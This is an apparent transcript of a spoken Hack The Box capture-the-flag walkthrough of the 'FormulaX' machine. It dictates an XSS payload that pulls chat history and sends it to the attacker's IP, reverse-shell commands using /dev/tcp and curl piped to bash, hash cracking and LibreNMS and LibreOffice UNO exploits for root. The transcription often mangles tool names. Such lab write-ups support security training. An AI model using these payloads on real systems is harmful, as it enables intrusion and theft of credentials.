Hello, welcome back again to my YouTube channel. This is Accurate Security, and before we start this video, I want to sincerely appreciate all my new YouTube subscribers and also for the existing subscribers. Thank you so much. You are the real G and you are the main power as to why I'm able to bring this content to you as always. And I really appreciate you for liking and subscribing to this channel. It keeps the channel growing. And for those that are watching this video, if you really enjoyed this video, please kindly like and subscribe to this channel as to giving me the courage to continue to bring content like this for you people. And the main purpose of today's video is to demonstrate or have a walkthrough of the newly hacked the box machine. This is FormulaX. It's part of the machine for season 4, I believe. So this machine is rated hard. And for me, I had a little bit of difficulty trying to break in because some of the payload I'm using for the cross-site scripting didn't work. And I know a lot of people might be struggling with this. The only thing I can pick from this is the fact that if you're confident that the payload that you put it in supposed to work for you, and if it's not working, I strongly recommend that you reset the machine. So use the same payload that worked for me, and before making this video I tried to use the same payload again and it didn't work. I tried several payloads, it didn't work. So it's not that you're not using the correct payload or maybe your system is misbehaving. I strongly recommend or suggest that you reset or restart the machine, and that should fix the issue for you guys. And for those that doesn't have any issue, well, it's lucky for you that you didn't have the opportunity or to witness this frustrating behavior. So without further ado, let me just explain briefly what we're gonna do. The machine is more of exploiting cross-site scripting vulnerability that allows us to discover hidden subdomain. And once we discover the subdomain, it's pretty much straightforward from there. We identify that the version is vulnerable to remote code execution, and with the payload, we get our initial foothold. And after getting the initial foothold, we also notice that MongoDB is running on the system itself. We enumerate that and dump our credentials, and we switch our user to Frank, I believe, Frank users, and we also discover some hidden services running, and we have to SSH tunnel in order for us to access that service. Limbre and PS, npm will say yes, Limbre npm, and also from a lot of Google searching, we see that we're able to create our own admin user, in which we were able to also exploit our remote code execution as well. It's pretty much straightforward. I would say the most difficult part of it is the first part, where you have to make your cross-site scripting payload to work for you. So enough of the talking, let's just jump in. Let me start by making a new directory and call it FormulaX, and also seed into that. And let me make another directory to store my nmap. Let me do result nmap, and so let's run nmap. Let me actually ping to see if I can access the system. Let's do 3 is fine, 2 is fine, 10, 11.6, and we can now run our nmap scan, which is nmap-sc for default script, sv to enumerate version, v for verbosity, and the IP address 10.10.11.6. And let's output all format and save it into result.log. Call these formula. Let's do formula.log. And let's see if we get something back. So we see port 22 and port 80. So let's go right here. Already have it. Let's refresh this. So we have the enter email and password. So there's no other way for us to enumerate a valid username if we just put test@me.com and then we put tester123 and click on login. It's saying invalid login or password. So if we try SQL injection, let's see, 1 = 1, and let's try that here also. See, it's not going to work. It says invalid login or password. So let's go ahead and create a new user, and let's call this channel 1, and the email will be channel@accuracy.local, and password, let's do tester123, and we have tester123. So if we log in, and we should be able to log in now. So let's do channel@accuracy.local and the password of tester123. So if we click login, it says login successful, and let's open this in a new tab, and also the about, and this, and let's do contact now. Let's have everything clear from our repeater, and let's go back to the prosy and let's intercept. So let's first test the, let's see if we should test the password functionality, so that way if we find a new user, we might try to change the password. Let's see how the password reset function works. So the password will be tester123, and the new password, let's do tester12, and let's do tester12. Let's tester12. Change this one also to tester12. So let's see if we intercepting this. Yes, we are. Let's click change password. Do not save. Let's come back here for this request. So we see that it's making a request to socket.io. So we're gonna inspect that later. So continue forwarding this. Okay, so this is what we need. Let's send this to a repeater, and if we just remove this, so this is the root password. Let's see if we don't include this, if it's going to change the password. So it says failed or invalid request, and if we put in, let's see, if we put in the old password, do tester123, let's do tester12 here and tester12 here, and send this off. So it says password successful. So if we don't include the root password, it's not going to work for us. So my theory was trying to delete the root password and just set in the new password, and if this works, then we gonna look into how this authorization header is built, so that way if we have a new user and we can customize this authorization cookie, then we might be able to first change their password without knowing their password. So it's making a post request to the API change password, so that we can move forward. So let's see, what else do we have? let me go back here and turn this intercept off. So I don't know if we change our password in case we have to log in again. I think we change it to tester12. Sweet. So let's go back to About Us. Welcome to our revolutionary problem solving chatbot. Your digital companion is conquering challenges, turning complexities into opportunities, and unlocking new realms. So it's just telling us about the page itself, the vision, and the mission. So we can close this, and we have the chatbot. So let's see if this is vulnerable to command injection, or let's first see how it's being used. So we send help, we send help again. It's not working for us. Greetings, how can I help you? Can you type help to see some built-in command? So typing the help is supposed to hold. Sweet. So it invalidated our token because we changed our password, so probably we have to log in again. So let's log out and log back in. So we use channel.acress.local and the new password was tester12. So if we did I just click on create account? Hopefully not. Lord, let's click on login. And let's do this and tester12. Oh no. Okay, let's do tester123. Probably didn't change the password. No, it says invalid. So we might probably have to create another account. So let's use channel1, and the email will be channel1@acress.local, and the password, let's use 123456 for the sake of simplicity. 123456. Is it 123456? And we can log in now, and let's put in our new email. This will be channel1@acress.local, and then the password 1234. Do we use 123456? Let's see. So login successful. So we were initially inspecting the chatbots. So if we type help, so it says the history shows the previous sent messages. You can always ask random questions. So if we say history, what do we get back? It says message sent, message sent. So the message, if you look carefully, what we sent was the help and the history. So if we type who am I and then send this back, nothing comes back to us. And if we type history, do we get who am I as part of the message sent? History. So we didn't get anything back. Let's try to refresh, and let's do history again. So every time we refresh the page, it only displays the last command that we sent. So let's check another one, which is the contact to admin. So whenever I see the contact to admin, it's more of like trying to exploit or see if there will be a cross-site scripting half-band that allows the administrator or whoever is viewing this page to call back to us and see if we can steal a section cookie, or maybe try force them to do something, maybe load a malicious JavaScript from the server that we host in our file from. So if we want to do that, so we could possibly test our theory, and let's do this. Let's actually clear this, clear, and let's do PHP server. Let's listen on 80, and we should go back here, a first name using channel, and we use the last name. Let's use Accuracy, and now we can come back and try one of the payload that allows this to call back to our system. Let's do P, and on error, because we are saying that it should load an image and the source is P, and if there's an error then it should load this. So on error it should, let me remove this pointer so you can see what I'm typing. So it's going to be equals to, let's declare a variable and call this scripts 1. Let's do documents dot create elements. If I could type elements and call this script, and then let's see, hopefully it's gonna work. So let's do script 1. I have to be careful to make sure I don't have typo. So script 1 dot source, and let's put our IP address. So this should be HTTP. We're listening on port 80, so that would be 10.10.14.39, and let's say we load evo.js, even though we don't have the file yet. So if it calls back and try to pull this, then we can fill the server with a malicious JavaScript. So let's do documents dot head to append that, append the child, and let's have script as 1. That's the name of the script that we have, and let's close this, and let's see, image source P unload variable script 1 document dot create elements script 1. The script source will be to load from our IP address and filled in evo.js document.head append child script. So if we send this, now we see that it tries to get this evo.js on our system, but we don't have that evo.js. So let's see, let's also increase the font a little bit. So let's go back here and see how this is going to turn out. So we should go and inspect the socket we saw earlier on. Let's see. So from the we check the history. Let's use these targets. This one. So let's see. Okay, more of the socket.io. Let's inspect how the chat function is working, because if we can load the history of another user, we should be good. So let's do that. So let's inspect this. Let's open it in a new tab. Let's actually click on this. Let me close this one. The contact us, we can leave that open, and I don't know if I copied the payload we used earlier on, but if not, we can craft another one. So what's it doing? Let the value constant request is making a reg start this with credential set of true, listening for messages, the socket on. This is when it's communicating to the socket. So receive the message, type in chat, So user message.value. So we need to find a way to load history instead of our own message. So what else? Let's check this. Control U, and we're viewing the chart.js, and so we need to have it load itself, which is the socket.io.js, and then from the chart, instead of loading our own message, it should load the history. Okay, so it seems I understand what's going on here. So let's go ahead and create our own evo.js scripts. So let's do evo.js. So we need to have, let's create script elements, so that way we can try to have this the way we want. Let's declare this constant script and have it document.create element, and this will be scripts. Okay, and next let's set the source. Let's set the source attribute of the script, and this will be scripts. Let's do scripts. That's fine. So that would be scripts.source, and let it load itself. So we want it to load, let's see, we want it to load the sockets.io here. Let's copy this and let's go back. Alright, so next we want it to append the script to the head. We wanted to append the script to the head of the HTML document, and let's do document.head.append child. Let's do child and scripts, and also let's try to add an event listener. Type for the load event of the script. So let's do scripts. Let's do script.add event listener and load function. Let's do function, and what else? What are we trying to do? So let's see, let's go back. So we need to have it make a GET request to the user API, so we can have this. So once the script is loaded, right, so we need to make a GET request to fetch data from the server. So this is us telling it to load the history, right? So let's do constant. Alright, let's see. Let's copy this. Let's copy this, and also we need this as well. let's copy this. So this right here, let's tap this. So what is going on here is initialize a socket .io connection with the server. Let's do that, and now we should listen. Let's see. So we should listen for the messages. So instead of printing it and displaying it to us, we need to have it send it to system. So let's copy this and try to manipulate this. So listen for the messages. So let's just copy this right here. So let's do this, come back here, let's paste this. So let's do this and send this back. Yep. So let's see, just want to make sure. Actually, let's delete this and type it out, because so where do we stop? We have it initialize socket .io connection with the server itself, and this one will be more of listen for the message, right? Let's do message event from the server, and we have the socket on the message, my message, and right here we need to have it send a get request to our local system with the received, if I could type, with the received message encoded, right? So now let's do fetch. Now we can put our IP address HTTP 10.10.14.39, and now we want to base64 B2A base64 encode the message, and we can terminate this, and also we can close this and close this and terminate this. Okay, so what else do we have? So let's see. These. Okay, so now need to have the socket.emit. So, and then the value of what we want. So sending the message to the server. So it's gonna be this one. So we have to send. Let's copy this, but then we have to change this to the history, because every time we put in our history, it sends us our previous command, but we want to get history of whoever is calling back to us. So let's do that. Let's do emit client message, and event to the server with the message history. That's what we want. So we can let's see. So we can have that here, and then we can change this value to history, and now close it. And finally, we can now close this. Hopefully it's going to work. So what we did was trying to have replicates exactly what we have here, and have the system call back and grab this, and hopefully we should have a B64 encode messages back. So let's save this, quit this, and let's stop this, so to be sure we're getting a fresh callback. And now we see that we have evo.php. Yeah, we have that. So let's actually terminate this, set up a new. It's now, let's do 8090, set this up. So let's go back, see if we still have the command in our clipboard. Let's see, do we have, trying to see if I have that in my clipboard, but if not, then I can retype it. So we're using contact. So let's do channel, and we have let's do trusty, and load this. We're listening on port 8090, so let's do that. 8090 and evo.js. So it's going to grab this evo.js file that we have. So what else? So document head append, and let's try to send this. So do we get anything back? So it's actually getting the evo.js, but let's see. Let's examine the evo.js. Cat evo.js. Oh, not listening on port 80. So let's do this. Let's PHP server. Let's listen on port 80, and let's try to send it again. And this time around, we'll leave it as 8090 and call this let's do channel and tester. So if we send this message, so it's getting this evo file. So something is probably wrong with our scripts. So let me copy that. Let's see, via evo. Let me see, I've already copied it, so let me remove that and call it vi evo2.js or evo1. Let's do evo1.js. and paste this. Still the same thing that we have. Okay, so now let's listen on port 80 again. So we have it as evo1.js. Let's terminate this and start it over again. So this will be, let me see if I still have it on my clipboard. So if we go back here, paste this, change this to evo1.js. evo1.js, this will be 8090. And then we have channel 1 and we have tester. So if we send this over, sweet, so it works this time around. So we see the base64 coded character back, so we can copy this, use CyberChef to decode this, or possibly we could use echo. Let me try to increase the font. And let me increase the font here. So I want to echo this, right, and then base64-d to decode. So it says, greetings, how can I help you today? You can type help to see some building commands. So next, let's try this. We also use echo and pipe it to base64-decode. It says, hello, I'm admin testing the chat application. So what next? So let's copy this. Let's use echo and paste this also, and base64-d to decode. It says, write a script for dev git auto update.chatbot.htb to work properly. And let's also check the last one here. Maybe this could be credential. So let's echo this and then pipe it to base64-d. Just write a script to automate the auto updates. So let's go ahead and add this to our host file. So this will be host, and this will be 10.10.11.6. so we have chatbot.htb, and next we have this .htb. So let's check that out. I think we can exit this. We can also try to clean our terminal, exit this, and let's leave this running. Maybe we might need it later. So let's go to HTTP and so we see it says enter a git URL, and what stood at was the simple git version 14. So if we copy this and search if there's a vulnerability for this, we can go to google.com and let's do exploits. If there's an exploit of vulnerability, we should be able to see that. So the first one, it's a simple git vulnerability. We can open this in a new command, in a new terminal, and also the command injection. So let's check these two out. So it's giving us three different, about 4, 1, 2, 3, 4 vulnerability. So it says remote code execution for version that's less than 3.16.0, and another one with remote code execution less than 3.15.0 and less than 3.0.5 for improper neutralization of argument delimiter. It's more of like command injection also. So let's see, what version do we have? Let's close the contact, we don't need that. So we have 3.14, so we could try this 3.14, that's less than this. So let's check this out. So here is the proof of concept. So here's the command, and right here. So let's open a new tab, and let's call this our RCE, and call this simple git. So we already have that here, and let's see, how do we do this? Let's go ahead and go to dashboard, prosy. Let's see. Here's the git updater. So let's do HTTP. Let's do 10.10.14.39, and let's go ahead and intercept the request. So we have it on. Let's intercept on get reports. So let's send this to a repeater. So first, let's see. Let's go back to the POC. How we cannot use it? Is it the same POC? Let's try this one first. If it doesn't work, then we go over to the next one. So let's copy this. Let's see. Probably this should be sufficient. Let's go back and paste it right here. So we're not going to touch anything. Let's try with ping. Let's ping our system. Let's do ping C4 10.10.14.39, and let's TCP dump. So we send the ICMP. So if we send this, we get something back. So it pinged the system 4 times, 1, 2, 3, 4. Okay, so now let's go ahead and set up our listener. So let's do bash -i. That would be dev TCP 10.10.14.39 9001 01. So let's see. Okay, so if we send this off, did we get anything back? Nope. Okay, so how about if we do this? Let's copy this. We're listening on 9001. Now let's change this to 9001 and copy this. And let's go back paste it right here and send this over. Still not getting anything back. So how about if we, let's be 64 in code and let's copy this and let's do echo this and let's pipe it to B64 64-D to decode and then pipe to bash. Is it gonna work? Nope. Sweet. So let's see if we let's do shell 1. Let's do shell dot sh. Let's go back again. Let's normalize our payload and we have bin batch dev TCP 10.10.14.39 9001. This should work. So let's go here and set this up. Save this. We have it as shell dot sh. Do we have any listener running? We have, let's see, pwd formulas and also pwd formula. So I could have actually used ls to see if we're still hosting that. So ls, so sweet. So what I'm trying to do is try to curl this and then pipe it to batch if it's gonna work. So let's do sh.c. that will be curl and http 10.10.14.39. we call it shell.sh and we want to pipe it to bash. So let's see, do we get something? Nope. So why is it not working for us? Maybe we can try different payload. Let's see. Let's go back here. Did it actually grab that? Did it? Ooh, that's why. There was a typo somewhere. Try to get shell. Oh Lord, right here. So if we try to grab shell, let's go back here. We should be able to get a reverse shell now. Let me clear this and try it again. If I send it, we're not getting anything back, and if we check our system, we get this. So let's see which Python 3, sweet, Python 3. Let's see, import pty.spawn and have it as bin bash. Did it work? Let's see. Okay, S2Y. So export term equals to S term. Sweet. So now let's see. Let's go back here. Let's go back to the hub Let's see if we can get any configurations that has the database information here. Let's see. Card connect.js, connect DB. So the DB name is testing. Ooh, mongoose. So probably we have MongoDB running here, and the DB name is testing. So let's see. Let me clear this. Let me set STTY. Rows, let's do 49. Rows 199. So that should set my terminal well. So SS dash LNTP. So we see that port 27017 is running, which is used by MongoDB. So if you want to check how that works, so we can, let's see, turn this off, disable this, and let's use this one. Go to Google and go to Arctrix. XYZ right here, and then look for the MongoDB. If you don't know how to interact or communicate with Mongo database, so everything is pretty much inside this hacking Bible, the way I call it. So just go here and once you connect, just use the show DBS to show the databases, and then use the database name to interact with it if you want to do right here. So some MongoDB command, show DBS, use the DBS, show the collections. It's more of like showing the table in MySQL. Let's see, let's close this. So more of like showing the tables, and then selecting all from whatever tables that you have. So it might be maybe user table, or maybe data table. So this is how you dump data from the table. So let's do that. Let me clear this and use Mongo, and let's do show DBS. So we have admin, we have config, we have local, and we have testing. So we saw that the app was using the testing one, so we can use testing to use that database, and we can use show collections, which is similar to show tables, and we have the messages, and we have the users. So to dump the users, we can use db users.find function, and this should dump everything for us. So we have the admin, chatbots, we have the hatch, and also we have the Frank Doki, and we also have the password hash right here. So let's see if we copy this, vi, let's do chat hash.txt, and let's put this one here, and this would be, let's say this would be for user Frankie, and come back here, let's paste this right in front, and that, and let's also copy for the admin, for the admin. So this is our account, so we know our password. We don't have to click our password. And let's do this would be for the admin, and we have this, and let's go ahead and use hashcards. We can exit this and clean the terminal interface. So let's do hashcards, and let's do the hash itself. We use chat, and the word list users share word list and rockq.txt. And since we have the user format, let's do -- user. So it's going to dictate the mode. So the hash format is more of like Bluefish, so we can use 3200. So let's go ahead and set the mode back to 3200. M32. Oh, let's go back here. So -m, that'll be 3200, and let's have that run in the background. So while we wait for that, let's continue to enumerate the system folder. So let me go grab the latest update or version of Limpies. So you can use Limpies GitHub, and let's see. Okay, as you can see, this was last updated yesterday. I like getting the latest version because of the updates or the changes made to it. So let's go down and grab this one. So let me copy the link and go back. Let's use this one, and wget. So now I can go back to the server, seed into dev shm, and let's see. Let's wget http 10.10.14.39. I want to get limpies.sh. So let's clear this ls. We see the limpies. Let's change the permission mode and call this limpies. Now we can run the limpies. Did we get anything back? Not yet. Okay. Alright, let's try checking this and see what we have. Let's go back. We can check the kernel version if there's vulnerability for this, but it's still doing its thing. Okay. So it's jammy. Let's see. SSH client. Okay. Let's see, we might check for any exploits. So this is from exploit suggester, so let's keep going. Let's see. So we're checking the processes, the cron, the time, and the services. We want to check if anything stands out. So there's a user car relay. Okay. So it's worth checking who this user is. But we don't see this inside the MongoDB, or probably we have to enumerate a separate database because we only connected to the testing. We have Libre NMS. That's another user. So let's keep going. So this is us. So this is www data. Okay. So remote debugging parts. Let's see. So we're still waiting for the okay, let's continue. See any cron job. So it's automation script dots. So we have to check this. Might have to check this. Let's see what it's doing. So the script.sh and who owns that. Okay. I think pretty much everything seems normal, standard to me. But let's keep going. So we have the FormulaX, we have the chatbot. Active ports. So there's my SQL running. There's another port 8000. And this engineers worker P 3000. So all these are listening on the local ports. So we could try to have a SSH tunnel created so we could access these. But let's keep going. So we have pretty much 3 users, set routes, and another interesting user is the car relay because it belongs to the sudo group. It has a sudo group here, sudo permission rather. So hopefully if we can somehow get the password and see what we can do with that. So these are all the useful softwares. Try to use the base64. We could also have tried the SOCAT. So this seems normal. Okay. I think our best bet is probably wait for the password hash. Okay, so let's see. Roots, the server name. So this is what is listening on port 3000. So library NMS. So what is this? Let's copy this. Let's go here. Google Chrome. Let's check the community. Actually, before we check the community, let's see what this is. So what is it used for? It's a fully featured network monitoring system. I believe it's similar to Negius that provides a wealth of features and device support. Numbers can be used for monitor a wide range of features, including support for varieties of protocols, performance monitoring. Okay, so let's go ahead. So it's worth checking. So I think we should be putting out our notes. Let me see. Yeah, notes.txt. So we need to check port 3000. Maybe we have to port forward that, and also there's a user with sudo privilege. I believe there's kai_relay with sudo. So let's also check these. Okay, so who owns this password hash? Let's go back. Let's see. Let's save and quit. I believe we have the list. I will call it chatbot hash. So this is $2B10 by. So this is for Frank Doki. So, and the password is served to Manchester United. So I bet the creator of this machine is a Manchester United fans, Operate Devils. So let's try. Let's go ahead and finish with this, and we can now switch our user to Frank. Let's see. Also, let's continue with our notes. So this would be users this. Let's go back. It's Frank Doki. Let's do crates, and Frank. I believe is Doki, and would be Manchester United. Let's see if I have that user correctly. Frank. Okay, sweet. So let's continue. And there's another thing that I saw earlier on that is in opt directory. Let's see, I think it's part of the processes that we're running for library NMS. Let's see. Okay, I think we might have to check the directory itself. Let's go up. Alright, so let's let's leave this up. I don't want to clear it, so let's cd into opt, cd pt ls. So we are not NMS, and so we cannot access these. Can we? Oh, we do. Yes. We do not have permission to list. Okay. So what else can we do? Let's change, or maybe SSH. Let's switch user to Frank. Okay. And put the password as Manchester United. Manchester United. Sweet. So now, I cleared the screen by mistake, so I can run the link piece if I want again. But let's go to the home directory. ls, that's lh. To list of users, we have Frank and Kai. So if we cd into Frank and ls, we can read the user flag. So I don't want to like spoil the machine itself by just displaying the flag itself, but we can use wc.c to count users flags, users tst, so it's number flags that HTB has. So enough of that. So let's go ahead and try to access the service that's running on port 3000. So let's do SSH, look, port forwarding. So we want to listen on port 3000 ourselves, and we want to connect to ports 127.0.0.1, and for service that's running on 3000 on the remote machine, and the user as well as the IP address, which is 10.10.11.6. so if we press enter, then it's going to prompt us for the password, which is Manchester United. And now we can go back to our machine. Let's use this, and we can do HTTP 127.0.0.1 and connect to port 3000 that we're listening on. So we have Libre and MS. Do they have a default crate for this? Let's see. Let's do .com. Libre MS default crates. So the default web GUI is, let's use this default password and see if we can log in Libre NMS and Libre NMS and the password, and try to log in. It says invalid credentials. So let's go ahead again. Let's try admin, and let's log in. It says invalid credential. These credentials do not match our record. So let's see, we have the community, and let's search for admin. search for anything that has admin. So duplicate entry, HTTP auth, no admin login with radius authentication. Let's use more. So it has over 50 plus for result relating to admin. Admin login with radius, admin user not admin, admin permission removed when changing password via settings, API token, change the admin password is failing. So go there, see from the other post on how to reset the admin password. The solution is to create a new user. To do this, we can use I can't find such command on the system. Did I miss it? So let's read this. Seems interesting to me. So how can we create new user? Okay, so to do this, HTB mentioned. So the command is mentioned. I can't find such command on my system. So how do we find the admin add.php? Not sure about this, but the topic was automatically closed 90 days ago. So let's move on. So heading admin user on Libre. Okay, this also looks interesting. Let's go ahead and check this out. I am new to Libre and have sort of an issue. Colleague that was managing that quit with the end of January, and I continue to do his work. It didn't elevate right for my users to admin level, and now I cannot add or remove users, nor do I have options to do so in GUI. Okay, so command that I like to look. So it's going to be add user.php, the username, the password, and the level is 1 to 10. So email without commas, of course. So this is the below command. This one says the command works, so we can try that, which is add user.php. We assume this will be the user, and this will be the password, and then this will be the level. So say you should not mention what level, just give it 10 for an admin. So let's try this and see if it's going to work. We see that we have this running on the local machine. Now let's go back here, and where do we have cd into opt? We know that this service is being run by a Libre user, so we can do ls.lh. So let's do that. And unfortunately we cannot list this to be sure if we have the add user.php. So what we can do is just go off blind and do add user.php and call it Aquarius, and the password would be please subscribe. Let's do that, and then let's add the level to 10. Sweet, awesome. So we have user Aquarius added successfully. So let's try and log in with this. Hopefully we can log in. So let's do Aquarius, and this will be a password, which is please subscribe. We don't want to save this, and we are in. Okay, so let's see, we have to start playing around. Let's see if we can set different alerts or no alerts. So what is it? Alert templates. So how does this work? Okay, so we have the default templates. Let's do PHP. Let's do system tests. Let's just do let's do echo instead. Echo hello world and PHP. Let's see if it's really not doing anything. Okay, let's try and refresh. Are we really an admin? Let's confirm that. My settings. So we can change password. It's asking for the current password, and then we put in the new password. Yeah, so global administrative access, that's what we have. And let's also check manage users. So we have Kyle, we have Frankie Doki, and this is our user. So Frankie's global read. So could we have logged in with Frank Doki, but we won't have the admin access? So let's also check, let's validate our config. Ooh, the puller failed. No active pulling method detected. Says server name is set incorrectly for your web server. Update your web server config and have it as name nms.com. So let's go ahead and modify our local host, and let's do that. Let's open different tab. Let's open a different tab via its host, and this will be let's try and log out and log back in again. Let's see, log out, and let's change these to http nms.com, and we want to listen at 3000. So let's try login again with Alcores, and the password will be please subscribe, and let's log in. We don't want to save these. And let's check or validate our global settings again. Validate config. So now we're not getting the same error for the web server. So let's go back to the alerts templates and maybe create a new template or modify the default templates. Okay, so this is the default template. We can possibly, let's back this up. Let's go back, because we want to leave the system the way it is. So let's do file sys file .txt. Let's do that. Let's paste it here. So when we're done, we can let's see, 7 exits. So let's do this one. Will be for Libre NMS, and let's do TCP dump again, and let's go back here and do PHP. I want to do system. Let's do ping. Let's do count 4. Let's do count 4 and the IP address 10.10.14.39, and close this, and let's do and PHP. So hopefully if we update this, it's updated, and we really didn't get anything back. So we need to see how the template is being used, or how we can use the templates. Let's see. Let's go back here. Nope. Let's go back and edit this. So let's see. Let's check the file that we copied previously. Let's do what do we have it? Call it sysfile. Sysfile.txt. So okay, everything started with at instead of percent, so I was using percent. Let's replace this with at, and also this, and let's update. It saves. Sweet, we get something back. Awesome. So now let's go back and set up our reverse shell here. So let's see, let's use the same method or the same payload we use here. Let's just copy this and pipe it to bash. You can just use system curl. Maybe possibly we can listen on 9001. Did we listen on 9001? Let's see. Let's shell.sh. Yeah, 9001. So we can do nc shell vmp 9001. We're listening on that. So let's go back again and change this and replace this with curl, and just use curl http 10.10.14.39. we have shell.sh, and we want to pipe it to bash, and let's see. So we should be able to get a connection back here. Let's exit this one, and we're listening on Libre NMS, and let's update, and we get a connection back. Awesome. So who am I? Libre NMS. So Python 3. Let's see. Import p2y. p2y.spawn. Bin bash. Oh, My bad, supposed to put spawn. So let's do Python 3 .c import p2y.spawn no spawn bin bash and st2y Roman circle fg enter export time equals to s time, and let's clear this. And now we can go back to dev shm and rerun our limpies ls, so we can do bash limpies again. So because we have another privilege, we try to rerun the limpies and see if we have access to credentials or something else. Otherwise we have to poke around and check the other ports, or other services that are running on the other ports. So let's go back here. So we still have Frank. What else can we check with Frank? So let's go back to home. So the home. Ls we have the Frank. Let's set it to that. Ls touch LAH for any hidden files. We have the SSH. So we could have used the SSH key to perform the tunneling instead of the password, but you can go either route. Let's go back if we have something back yet. So inside the environment variable, dp password, my chemical formula X, so it's a new password. So also this is for the limpies. Let's try this password while we wait for this to finish running. We could go back, let's clear this. I think let's expand this. Let's go back. Let's want to be sure I have the same username. So let's switch user to Carl relay, and let's paste the password, my chemical formula X. Now we are in suite. So let's clear who am I. We are Carl relay, and we know that it has a sudo privilege, so we can use sudo -l, and it says you can run the user bin office sh. Let's see, ls-lh. Let's see if we have permission to write anything inside here. So it belongs to root. We don't have write permission, we only have execute permission. So what exactly is it doing? So let's do cat this. So it accepts connection on the local host on port 2002. Right, so let's we can kill this. We don't need the password, we don't need the admin password, we already have that. Manchester United. So let's exit this, clean up our terminal a little bit, and expand this one. So let's see, so let's run the sudo, let's run this, and so it's listening now. Before that, let's see if we can connect to it. So we can use which and see. Is there a net get here? Which and see? Yes, there is. So we can use V. Let's just connect to it. Dash V and localhost, and we want to connect on 2002. So it says connection refused. So if we do this, and then we'll try this again, get something back. So what is this? If we go back, let's Google this. Google.com, and let's paste this. It's a Python Uno bridge. And this we're running headless Docker. So it's a sudo wood Apache Uno RCE. So this looks interesting. Let's check this out. So you will need to install the Python library. So the target machine needs to run Star Office Manager for the RCE to be present. The presence of the Star Office Manager that is externally reachable can be tested by looking at the banner, which we did. So we have it. So the way this script is going to work, it's more of running the UnoPy, the host, which will be the local host, and the port, which will be 2002. But let's check exactly what we have here. So let's do the raw. So this is an authenticated remote code execution on LibreOffice. So this code represents a small proof of concept of unauthenticated remote code execution. So you can read the rest here. And let's just copy this. Let's just copy this and let's go back to terminal, and we can exit this. Right, so we can leave that running. Let's go to dev.shm and we know that Python 3 exists on this machine. So do we have Vim? Which Vim? Nope. Which Nano? Okay, so we can use Nano. Uno RCE .py, and we can now paste these. So let's change this right here, and let's see if we can have a reverse shell here. Let's see, let's do 9001. Let's go ahead and paste these. Let's paste this here and let's exit. Yes, and let's listen on 9001 and see -vmp 9001. And now let's try to connect. Let's use Python 3, Uno RCE, and how do we use this? So we use --host and --ports. So host will be the local hosts and port will will be 2002. So it says not found. So it says not found. Okay, let's go back again. Let's do nano RCE, Uno RCE, and let's just do this. Okay, let's see, we want it to execute this. Let's see, let's do cat root SSH ID underscore RSA. Let's see if we can read the SSH key. Oh. Let's do RSA. Let's exit this. Yes. And let's connect again. There is an error. Where do we have that? Maybe that happened when I was... Okay, so it should be imports. Yes. Let's clear the screen and let's connect again. It says this not found. Okay, so how about if we try this? Let me see, let's create ls. So v shell.sh. Oh, we don't have that. Let's do nano v. Let's do shell.sh and come back here. Let's copy this and let's paste this. Oh, I thought I was using Vim, so let's use this and let's go ahead and edit the Uno and change this. Changes to let's do dev shm and we call it shell.sh, right? So let's see if this file exists. We know it does because if we do ls, we have it as shell.sh, pwd, it's inside dev shm. So let's go back again and run this. No, it should be the Uno, this one. So now we're getting a different error. So it says it's not saying the file not found, it's saying permission denied. So let's check the permission of the file that we created. So ls for shell. So we say it's read and write permission. So let's add execute permission on this chmod s plus x and have it as shell.sh. So if we go back again and run the same says file, that file number. Okay, so let's go back to nano and do the shell.sh. So why is this not working? But let's see, dash I dev tcp 10.10.14.39 9001, and let's see if it's gonna work. Let's see. Yes. Let's see. So if we run this, still saying the same thing. So how about, okay, give me 1 second, let's go back and use bin bash, if that's gonna make any difference. And if we run this now, sweet, awesome. So we now get roots. So who am I? We have roots, so we can go to roots, see the roots, and ls-ls. So we have the root.txt. So if we use wc, let's see, root.txt, root.txt. pwd, where are we? So we're in the root, so we can use wc, let's see, root.txt. So now we have the flag. I don't want to display the flag, but that's how you get the roots on the machine. I know it's been a long video. Do apologize for it taking so long, but if you do enjoy the video, please kindly like and subscribe to this YouTube channel. This helps the channel growing, and also it encouraged me to bring more content like this forward. And I hope I see you next time. Thank you all for watching. Have a nice day. Bye for now.